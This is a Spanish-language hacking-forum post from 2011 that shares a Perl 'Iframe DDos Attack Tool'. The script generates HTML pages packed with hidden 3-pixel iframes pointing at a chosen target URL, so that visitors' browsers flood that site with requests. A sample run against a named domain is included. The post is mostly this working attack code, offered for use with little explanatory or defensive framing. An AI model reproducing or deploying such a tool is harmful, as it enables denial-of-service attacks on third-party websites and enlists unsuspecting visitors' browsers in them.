elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Perl] Iframe DDos Attack Tool
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Perl] Iframe DDos Attack Tool  (Leído 2,745 veces)
BigBear


Desconectado Desconectado

Mensajes: 545



Ver Perfil
[Perl] Iframe DDos Attack Tool
« en: 7 Octubre 2011, 01:15 am »

Un simple poc para la los ataques de denegacion de servicio usando
iframes.


Código
  1. #!usr/bin/perl
  2. #Iframe DDos Attack Tool (C) Doddy Hackman 2011
  3.  
  4. use Cwd;
  5.  
  6. installer();
  7.  
  8. sub head {
  9. print "\n\n-- == Iframe DDos Attack Tool == --\n\n";
  10. }
  11.  
  12. sub copyright {
  13. print "\n\n -- == Doddy Hackman 2011\n\n";
  14. }
  15.  
  16. sub sintax {
  17. print "\n[+] sintax : $0 <target> <count file> <count iframe>\n";
  18. }
  19.  
  20. sub start {
  21. my ($target,$files,$iframe) = @_;
  22. print "\n[+] Starting the party\n\n";
  23. print "[+] Generating files and iframes\n";
  24. print "\n[+] All Save in ".getcwd()."/files/"."\n";
  25. for my $can(1..$files) {
  26. open (POC,">>files/index".$can.".html");
  27. for my $tx(1..$iframe) {
  28. print POC '<iframe src="'.$target.'" width="3" height="3"></iframe><br>';
  29. }
  30. close POC;
  31. }
  32. }
  33.  
  34. head();
  35. unless(@ARGV > 2) {
  36. sintax();
  37. } else {
  38. start($ARGV[0],$ARGV[1],$ARGV[2]);
  39. }
  40. copyright();
  41.  
  42. sub installer {
  43. unless (-d "files/") {
  44. mkdir("files/","777");
  45. }}
  46.  
  47. # ¿ The End ?
  48.  
Ejemplo de uso

Código:

C:\Documents and Settings\Administrador\Escritorio\Leviatan\Hacking\WarFactoy II
 Finales\poc iframe>poc.pl "pepo.com" 4 4


-- == Iframe DDos Attack Tool == --


[+] Starting the party

[+] Generating files and iframes

[+] All Save in C:/Documents and Settings/Administrador/Escritorio/Leviatan/Hack
ing/WarFactoy II Finales/poc iframe/files/


 -- == Doddy Hackman 2011



« Última modificación: 8 Octubre 2011, 18:59 pm por Doddy » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[C] Iframe DDOS
Programación C/C++
BigBear 0 1,802 Último mensaje 8 Enero 2012, 18:38 pm
por BigBear
[Java] Iframe DDOS
Java
BigBear 0 1,379 Último mensaje 12 Enero 2013, 03:11 am
por BigBear
[CONSULTA] DDOS attack
Hacking
Drkaldren 2 2,342 Último mensaje 6 Septiembre 2014, 19:41 pm
por Drkaldren
Problema muy grave! DDoS Attack « 1 2 »
Seguridad
Rubickko 11 6,542 Último mensaje 20 Noviembre 2014, 17:24 pm
por r32
Crear un Script DDOS attack con port especifico
Scripting
Julio0 1 2,436 Último mensaje 16 Enero 2019, 18:38 pm
por **Aincrad**
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines